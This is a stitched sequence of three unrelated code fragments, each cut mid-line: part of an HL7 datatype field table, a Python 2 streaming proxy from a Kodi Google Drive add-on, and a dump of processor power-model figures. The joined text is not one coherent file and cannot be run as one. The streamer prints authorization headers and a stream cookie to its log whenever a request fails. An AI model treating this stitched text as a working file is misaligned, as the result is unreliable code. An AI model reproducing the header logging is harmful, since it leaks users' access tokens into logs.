'CM_JOB_CODE_2': ['leaf', None, 'ID', 'EMPLOYEE_CLASSIFICATION', None, -1],
'CM_LA1_1': ['sequence', None, 'CM_INTERNAL_LOCATION', 'DISPENSE_DELIVER_TO_LOCATION', None, -1],
'CM_LA1_2': ['sequence', None, 'AD', 'LOCATION', None, -1],
'CM_LICENSE_NO_1': ['leaf', None, 'ST', 'LICENSE_NUMBER', None, -1],
'CM_LICENSE_NO_2': ['leaf', None, 'ST', 'ISSUING_STATE_PROVINCE_COUNTRY', None, -1],
'CM_MOC_1': ['leaf', None, 'ST', 'DOLLAR_AMOUNT', None, -1],
'CM_MOC_2': ['leaf', None, 'ST', 'CHARGE_CODE', None, -1],
'CM_MSG_1': ['leaf', None, 'ID', 'MESSAGE_TYPE', None, -1],
'CM_MSG_2': ['leaf', None, 'ID', 'TRIGGER_EVENT', None, -1],
'CM_NDL_1': ['sequence', None, 'CN', 'INTERPRETER_TECHNICIAN', None, -1],
'CM_NDL_2': ['sequence', None, 'TS', 'START_DATE_TIME', None, -1],
'CM_NDL_3': ['sequence', None, 'TS', 'END_DATE_TIME', None, -1],
'CM_NDL_4': ['sequence', None, 'CM_INTERNAL_LOCATION', 'LOCATION', None, -1],
'CM_OCD_1': ['leaf', None, 'ID', 'OCCURRENCE_CODE', None, -1],
'CM_OCD_2': ['leaf', None, 'DT', 'OCCURRENCE_DATE', None, -1],
'CM_OSP_1': ['leaf', None, 'ID', 'OCCURRENCE_SPAN_CODE', None, -1],
'CM_OSP_2': ['leaf', None, 'DT', 'OCCURRENCE_SPAN_START_DATE', None, -1],
'CM_OSP_3': ['leaf', None, 'DT', 'OCCURRENCE_SPAN_STOP_DATE', None, -1],
'CM_PARENT_RESULT_1': ['sequence', None, 'CE', 'OBSERVATION_IDENTIFIER_OBX_3_OF_PARENT_RESULT', None, -1],
'CM_PARENT_RESULT_2': ['leaf', None, 'ST', 'SUB_ID_OBX_4_OF_PARENT_RESULT', None, -1],
'CM_PARENT_RESULT_3': ['sequence', None, 'CE', 'RESULT_OBX_5_OF_PARENT_RESULT', None, -1],
'CM_PAT_ID_1': ['leaf', None, 'ST', 'PATIENT_ID', None, -1],
'CM_PAT_ID_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CM_PAT_ID_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CM_PAT_ID_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_PAT_ID_5': ['leaf', None, 'ID', 'TYPE', None, -1],
'CM_PAT_ID_0192_1': ['leaf', None, 'ST', 'PATIENT_ID', None, -1],
'CM_PAT_ID_0192_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CM_PAT_ID_0192_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CM_PAT_ID_0192_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_PAT_ID_0192_5': ['leaf', None, 'ID', 'TYPE', 'HL70192', -1],
'CM_PCF_1': ['leaf', None, 'ID', 'PRE_CERTIFICATION_PATIENT_TYPE', None, -1],
'CM_PCF_2': ['leaf', None, 'ID', 'PRE_CERTICATION_REQUIRED', None, -1],
'CM_PCF_3': ['sequence', None, 'TS', 'PRE_CERTIFICATION_WINDOW', None, -1],
'CM_PEN_1': ['leaf', None, 'ID', 'PENALTY_ID', None, -1],
'CM_PEN_2': ['leaf', None, 'NM', 'PENALTY_AMOUNT', None, -1],
'CM_PIP_1': ['sequence', None, 'CE', 'PRIVILEGE', None, -1],
'CM_PIP_2': ['sequence', None, 'CE', 'PRIVILEGE_CLASS', None, -1],
'CM_PIP_3': ['leaf', None, 'DT', 'EXPIRATION_DATE', None, -1],
'CM_PIP_4': ['leaf', None, 'DT', 'ACTIVATION_DATE', None, -1],
'CM_PLACER_1': ['leaf', None, 'ID', 'UNIQUE_PLACER_ID', None, -1],
'CM_PLACER_2': ['leaf', None, 'ID', 'PLACER_APPLICATION', None, -1],
'CM_PLN_1': ['leaf', None, 'ST', 'ID_NUMBER', None, -1],
'CM_PLN_2': ['leaf', None, 'ID', 'TYPE_OF_ID_NUMBER_ID', None, -1],
'CM_PLN_3': ['leaf', None, 'ST', 'STATE_OTHER_QUALIFIYING_INFO', None, -1],
'CM_POSITION_1': ['leaf', None, 'ST', 'SAAL', None, -1],
'CM_POSITION_2': ['leaf', None, 'ST', 'TISCH', None, -1],
'CM_POSITION_3': ['leaf', None, 'ST', 'STUHL', None, -1],
'CM_PRACTITIONER_1': ['sequence', None, 'CN', 'PROCEDURE_PRACTITIONER_ID', None, -1],
'CM_PRACTITIONER_2': ['leaf', None, 'ID', 'PROCEDURE_PRACTITIONER_TYPE', None, -1],
'CM_PTA_1': ['leaf', None, 'ID', 'POLICY_TYPE', 'HL70147', -1],
'CM_PTA_2': ['leaf', None, 'ID', 'AMOUNT_CLASS', 'HL70193', -1],
'CM_PTA_3': ['leaf', None, 'NM', 'AMOUNT', None, -1],
'CM_RANGE_1': ['sequence', None, 'CE', 'LOW_VALUE', None, -1],
'CM_RANGE_2': ['sequence', None, 'CE', 'HIGH_VALUE', None, -1],
'CM_RANGE_SIMPLE_1': ['leaf', None, 'ST', 'LOW_VALUE', None, -1],
'CM_RANGE_SIMPLE_2': ['leaf', None, 'ST', 'HIGH_VALUE', None, -1],
'CM_RFR_1': ['sequence', None, 'CE', 'REFERENCE_RANGE', None, -1],
'CM_RFR_2': ['leaf', None, 'ID', 'SEX', None, -1],
'CM_RFR_3': ['sequence', None, 'CE', 'AGE_RANGE', None, -1],
'CM_RFR_4': ['sequence', None, 'CE', 'GESTATIONAL_AGE_RANGE', None, -1],
'CM_RFR_5': ['leaf', None, 'ST', 'SPECIES', None, -1],
'CM_RFR_6': ['leaf', None, 'ID', 'RACE_SUBSPECIES', None, -1],
'CM_RFR_7': ['leaf', None, 'ST', 'TEXT_CONDITION', None, -1],
'CM_RMC_1': ['leaf', None, 'ID', 'ROOM_TYPE', None, -1],
'CM_RMC_2': ['leaf', None, 'ID', 'AMOUNT_TYPE', None, -1],
'CM_RMC_3': ['leaf', None, 'NM', 'COVERAGE_AMOUNT', None, -1],
'CM_SPD_1': ['leaf', None, 'ST', 'SPECIALTY_NAME', None, -1],
'CM_SPD_2': ['leaf', None, 'ST', 'GOVERNING_BOARD', None, -1],
'CM_SPD_3': ['leaf', None, 'ID', 'ELIGIBLE_OR_CERTIFIED', None, -1],
'CM_SPD_4': ['leaf', None, 'DT', 'DATE_OF_CERTIFICATION', None, -1],
'CM_SPS_1': ['sequence', None, 'CE', 'SPECIMEN_SOURCE_NAME_OR_CODE', None, -1],
'CM_SPS_2': ['leaf', None, 'TX', 'ADDITIVES', None, -1],
'CM_SPS_3': ['leaf', None, 'TX', 'FREETEXT', None, -1],
'CM_SPS_4': ['sequence', None, 'CE', 'BODY_SITE', None, -1],
'CM_SPS_5': ['sequence', None, 'CE', 'SITE_MODIFIER', None, -1],
'CM_UVC_1': ['leaf', None, 'ID', 'VALUE_CODE', None, -1],
'CM_UVC_2': ['leaf', None, 'NM', 'VALUE_AMOUNT', None, -1],
'CM_VR_1': ['leaf', None, 'ST', 'FIRST_DATA_CODE_VALUE', None, -1],
'CM_VR_2': ['leaf', None, 'ST', 'LAST_DATA_CODE_CALUE', None, -1],
'CN_1': ['leaf', None, 'ID', 'ID_NUMBER', None, -1],
'CN_2': ['leaf', None, 'ST', 'FAMILIY_NAME', None, -1],
'CN_3': ['leaf', None, 'ST', 'GIVEN_NAME', None, -1],
'CN_4': ['leaf', None, 'ST', 'MIDDLE_INITIAL_OR_NAME', None, -1],
'CN_5': ['leaf', None, 'ST', 'SUFFIX_E_G_JR_OR_III', None, -1],
'CN_6': ['leaf', None, 'ST', 'PREFIX_E_G_DR', None, -1],
'CN_7': ['leaf', None, 'ST', 'DEGREE_E_G_MD', None, -1],
'CN_8': ['leaf', None, 'ID', 'SOURCE_TABLE_ID', None, -1],
'CQ_1': ['leaf', None, 'ST', 'QUANTITY', None, -1],
'CQ_2': ['leaf', None, 'ST', 'UNITS', None, -1],
'PN_1': ['leaf', None, 'ST', 'FAMILIY_NAME', | |
<reponame>akuala/REPO.KUALA<filename>plugin.video.gdrive/resources/lib/streamer.py<gh_stars>1-10
'''
Copyright (C) 2014-2016 ddurdle
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SocketServer import ThreadingMixIn
import threading
import re
import urllib, urllib2
import xbmc, xbmcaddon, xbmcgui, xbmcplugin
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
class MyHTTPServer(ThreadingMixIn,HTTPServer):
def __init__(self, *args, **kw):
HTTPServer.__init__(self, *args, **kw)
self.ready = True
def setFile(self, playbackURL, chunksize, playbackFile, response, fileSize, url, service):
self.playbackURL = playbackURL
self.chunksize = chunksize
self.playbackFile = playbackFile
self.response = response
self.fileSize = fileSize
self.url = url
self.service = service
self.ready = True
self.state = 0
self.lock = 0
def setURL(self, playbackURL):
self.playbackURL = playbackURL
def setAccount(self, service, domain):
self.service = service
self.domain = domain
self.playbackURL = ''
self.crypto = False
self.ready = True
class myStreamer(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_POST(self):
# debug - print headers in log
headers = str(self.headers)
print(headers)
# passed a kill signal?
if self.path == '/kill':
self.server.ready = False
return
# redirect url to output
elif self.path == '/playurl':
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length) # <--- Gets the data itself
#print post_data
for r in re.finditer('url\=([^\|]+)\|Cookie\=DRIVE_STREAM\%3D([^\&]+)' ,
post_data, re.DOTALL):
url = r.group(1)
drive_stream = r.group(2)
print "drive_stream = " + drive_stream + "\n"
print "url = " + url + "\n"
self.server.playbackURL = url
self.server.drive_stream = drive_stream
self.server.service.authorization.setToken('<PASSWORD>STREAM',drive_stream)
self.send_response(200)
self.end_headers()
elif self.path == '/crypto_playurl':
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length) # <--- Gets the data itself
#print post_data
for r in re.finditer('url\=([^\|]+)' ,
post_data, re.DOTALL):
url = r.group(1)
drive_stream = ''
print "drive_stream = " + drive_stream + "\n"
print "url = " + url + "\n"
self.server.crypto = True
self.server.playbackURL = url
self.server.drive_stream = drive_stream
self.send_response(200)
self.end_headers()
def do_HEAD(self):
# debug - print headers in log
headers = str(self.headers)
print(headers)
# passed a kill signal?
if self.path == '/kill':
self.server.ready = False
return
# redirect url to output
elif self.path == '/play':
url = self.server.playbackURL
print 'HEAD ' + url + "\n"
req = urllib2.Request(url, None, self.server.service.getHeadersList())
req.get_method = lambda : 'HEAD'
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
print "ERROR\n" + self.server.service.getHeadersEncoded()
self.server.service.refreshToken()
req = urllib2.Request(url, None, self.server.service.getHeadersList())
req.get_method = lambda : 'HEAD'
try:
response = urllib2.urlopen(req)
except:
print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
return
else:
return
self.send_response(200)
#print str(response.info()) + "\n"
self.send_header('Content-Type',response.info().getheader('Content-Type'))
self.send_header('Content-Length',response.info().getheader('Content-Length'))
self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
self.send_header('Date',response.info().getheader('Date'))
self.send_header('Content-type','video/mp4')
self.send_header('Accept-Ranges','bytes')
#self.send_header('ETag',response.info().getheader('ETag'))
#self.send_header('Server',response.info().getheader('Server'))
self.end_headers()
## may want to add more granular control over chunk fetches
#self.wfile.write(response.read())
response.close()
print "DONE"
self.server.length = response.info().getheader('Content-Length')
# redirect url to output
else:
url = str(self.server.domain) + str(self.path)
print 'GET ' + url + "\n"
#Handler for the GET requests
def do_GET(self):
# debug - print headers in log
headers = str(self.headers)
print(headers)
start = ''
end = ''
startOffset = 0
for r in re.finditer('Range\:\s+bytes\=(\d+)\-' ,
headers, re.DOTALL):
start = int(r.group(1))
break
for r in re.finditer('Range\:\s+bytes\=\d+\-(\d+)' ,
headers, re.DOTALL):
end = int(r.group(1))
break
# passed a kill signal?
if self.path == '/kill':
self.server.ready = False
return
# redirect url to output
elif self.path == '/play':
if (self.server.crypto and start != '' and start > 16 and end == ''):
#start = start - (16 - (end % 16))
print "START = " + str(start)
startOffset = 16-(( int(self.server.length) - start) % 16)+8
# if (self.server.crypto and start == 23474184 ):
#start = start - (16 - (end % 16))
# start = 23474184 - 8
url = self.server.playbackURL
print 'GET ' + url + "\n" + self.server.service.getHeadersEncoded() + "\n"
if start == '':
req = urllib2.Request(url, None, self.server.service.getHeadersList())
else:
req = urllib2.Request(url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes='+str(start- startOffset)+'-' + str(end)))
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
print "ERROR\n" + self.server.service.getHeadersEncoded()
self.server.service.refreshToken()
req = urllib2.Request(url, None, self.server.service.getHeadersList())
try:
response = urllib2.urlopen(req)
except:
print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
return
else:
return
if start == '':
self.send_response(200)
self.send_header('Content-Length',response.info().getheader('Content-Length'))
else:
self.send_response(206)
self.send_header('Content-Length', str(int(response.info().getheader('Content-Length'))-startOffset))
#self.send_header('Content-Range','bytes ' + str(start) + '-' +str(end))
if end == '':
self.send_header('Content-Range','bytes ' + str(start) + '-' +str(int(self.server.length)-1) + '/' +str(int(self.server.length)))
else:
self.send_header('Content-Range','bytes ' + str(start) + '-' + str(end) + '/' +str(int(self.server.length)))
#self.send_header('Content-Range',response.info().getheader('Content-Range'))
print 'Content-Range!!!' + str(start) + '-' + str(int(self.server.length)-1) + '/' +str(int(self.server.length)) + "\n"
print str(response.info()) + "\n"
self.send_header('Content-Type',response.info().getheader('Content-Type'))
# self.send_header('Content-Length',response.info().getheader('Content-Length'))
self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
self.send_header('Date',response.info().getheader('Date'))
self.send_header('Content-type','video/mp4')
self.send_header('Accept-Ranges','bytes')
#self.send_header('ETag',response.info().getheader('ETag'))
#self.send_header('Server',response.info().getheader('Server'))
self.end_headers()
## may want to add more granular control over chunk fetches
#self.wfile.write(response.read())
if (self.server.crypto):
self.server.service.settings.setCryptoParameters()
from resources.lib import encryption
decrypt = encryption.encryption(self.server.service.settings.cryptoSalt,self.server.service.settings.cryptoPassword)
CHUNK = 16 * 1024
decrypt.decryptStreamChunk(response,self.wfile, startOffset=startOffset)
else:
CHUNK = 16 * 1024
while True:
chunk = response.read(CHUNK)
if not chunk:
break
self.wfile.write(chunk)
#response_data = response.read()
response.close()
print "DONE"
# redirect url to output
elif self.path == '/playx':
# if (self.server.crypto and start != '' and end == ''):
# #start = start - (16 - (end % 16))
# print "START = " + str(start)
# start = start - (16-(( int(self.server.length) - start) % 16) )
# if (self.server.crypto and start == 23474184 ):
#start = start - (16 - (end % 16))
# start = 23474184 - 8
url = self.server.playbackURL
print 'GET ' + url + "\n" + self.server.service.getHeadersEncoded() + "\n"
req = urllib2.Request(url, None, self.server.service.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
print "ERROR\n" + self.server.service.getHeadersEncoded()
self.server.service.refreshToken()
req = urllib2.Request(url, None, self.server.service.getHeadersList())
try:
response = urllib2.urlopen(req)
except:
print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
return
else:
return
self.send_response(200)
self.send_header('Content-Length',response.info().getheader('Content-Length'))
print str(response.info()) + "\n"
self.send_header('Content-Type',response.info().getheader('Content-Type'))
# self.send_header('Content-Length',response.info().getheader('Content-Length'))
self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
self.send_header('Date',response.info().getheader('Date'))
self.send_header('Content-type','video/mp4')
# self.send_header('Accept-Ranges','bytes')
#self.send_header('ETag',response.info().getheader('ETag'))
#self.send_header('Server',response.info().getheader('Server'))
self.end_headers()
## may want to add more granular control over chunk fetches
#self.wfile.write(response.read())
if (self.server.crypto):
self.server.service.settings.setCryptoParameters()
from resources.lib import encryption
decrypt = encryption.encryption(self.server.service.settings.cryptoSalt,self.server.service.settings.cryptoPassword)
CHUNK = 16 * 1024
decrypt.decryptStreamChunk(response,self.wfile, 16)
else:
CHUNK = 16 * 1024
while True:
chunk = response.read(CHUNK)
if not chunk:
break
self.wfile.write(chunk)
#response_data = response.read()
response.close()
print "DONE"
# redirect url to output
else:
url = str(self.server.domain) + str(self.path)
print 'GET ' + url + "\n"
#TO DELETE
def do_GET2(self):
# passed a kill signal?
if self.path == '/kill':
self.server.ready = False
return
# debug - print headers in log
headers = str(self.headers)
print(headers)
# client passed a range of bytes to fetch
start = ''
end = ''
count = 0
for r in re.finditer('Range\:\s+bytes\=(\d+)\-' ,
headers, re.DOTALL):
start = int(r.group(1))
break
for r in re.finditer('Range\:\s+bytes\=\d+\-(\d+)' ,
headers, re.DOTALL):
end = int(r.group(1))
if end == 0:
end = ''
break
# pass back the appropriate headers
if start == '':
self.send_response(200)
self.send_header('Content-Length',self.server.fileSize)
else:
self.send_response(206)
if start > 0:
count = int(start/int(self.server.chunksize))
self.send_header('Content-Length',str(self.server.fileSize-(count*int(self.server.chunksize))))
self.send_header('Content-Range','bytes ' + str(start) + '-' + str(self.server.fileSize-1)+'/'+str(self.server.fileSize))
req = urllib2.Request(self.server.url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes '+ str(start) + '-' + str(end)))
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
print "error " + str(e.code) + ' header Range' + str(start) + '-' + str(end)
self.server.service.refreshToken()
req = urllib2.Request(self.server.url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes '+ str(start) + '-' + str(end)))
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
print "error " + str(e.code)
return
self.send_header('Content-type','video/mp4')
self.send_header('Accept-Ranges','bytes')
self.end_headers()
#while self.server.state == 2:
# self.server.state = 3
#while self.server.state == 3:
# xbmc.sleep(10)
# is streamer ready to serve packets?
if self.server.state == 0:
## fetch the entire stream?
#self.server.state = 2
#try:
if count == 0:
with open(self.server.playbackURL, "rb") as f:
while True:
chunk = f.read(self.server.chunksize)
if chunk:
self.wfile.write(chunk)
count = count + 1
else:
break
f.close()
#fi = open(self.server.playbackFile, 'ab')
#self.server.state = 1
if self.server.lock != 0:
| |
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.290779,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.64553,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00473762,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.206409,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0217634,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.185392,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.299031,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.150941,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.635364,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.208698,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.2718,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00411157,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00777619,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0581606,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0575097,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0622721,
'Execution Unit/Register Files/Runtime Dynamic': 0.0652859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.123713,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.326125,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.63856,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0021259,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0021259,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00190562,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000767217,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000826131,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00698355,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0184546,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0552855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.51664,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.221291,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.187775,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.90582,
'Instruction Fetch Unit/Runtime Dynamic': 0.48979,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
